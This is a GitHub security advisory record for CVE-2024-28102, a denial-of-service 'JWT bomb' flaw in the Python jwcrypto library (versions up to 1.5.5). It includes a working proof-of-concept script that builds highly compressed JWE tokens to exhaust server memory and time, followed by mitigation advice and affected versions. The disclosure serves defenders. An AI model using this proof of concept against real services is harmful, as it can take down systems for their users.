GHSA-j857-7rvv-vj97

Source

https://github.com/advisories/GHSA-j857-7rvv-vj97

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-j857-7rvv-vj97/GHSA-j857-7rvv-vj97.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-j857-7rvv-vj97

Aliases

CVE-2024-28102

Related

CGA-89jw-m7cp-528c

Published

2024-03-06T20:00:56Z

Modified

2024-03-21T18:31:50.707474Z

Severity

6.8 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H CVSS Calculator

Summary

JWCrypto vulnerable to JWT bomb Attack in `deserialize` function

Details

Affected version

Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5

Description

An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time.

Poc

from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer. <img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">

Mitigation

To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens.

References

[1] CVE-2024-21319

References

Affected packages

PyPI / jwcrypto

Package

Name: jwcrypto; View open source insights on deps.dev
Purl: pkg:pypi/jwcrypto

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.5.6

Affected versions

0.*

0.2.0

0.2.1

0.3.0

0.3.1

0.4.0

0.4.1

0.4.2

0.5.0

0.6.0

0.7

0.8

0.9

0.9.1

1.*

1.0

1.2

1.3

1.3.1

1.4

1.4.1

1.4.2

1.5.0

1.5.1

1.5.2

1.5.3

1.5.4

1.5.5

Database specific

{
    "last_known_affected_version_range": "<= 1.5.5"
}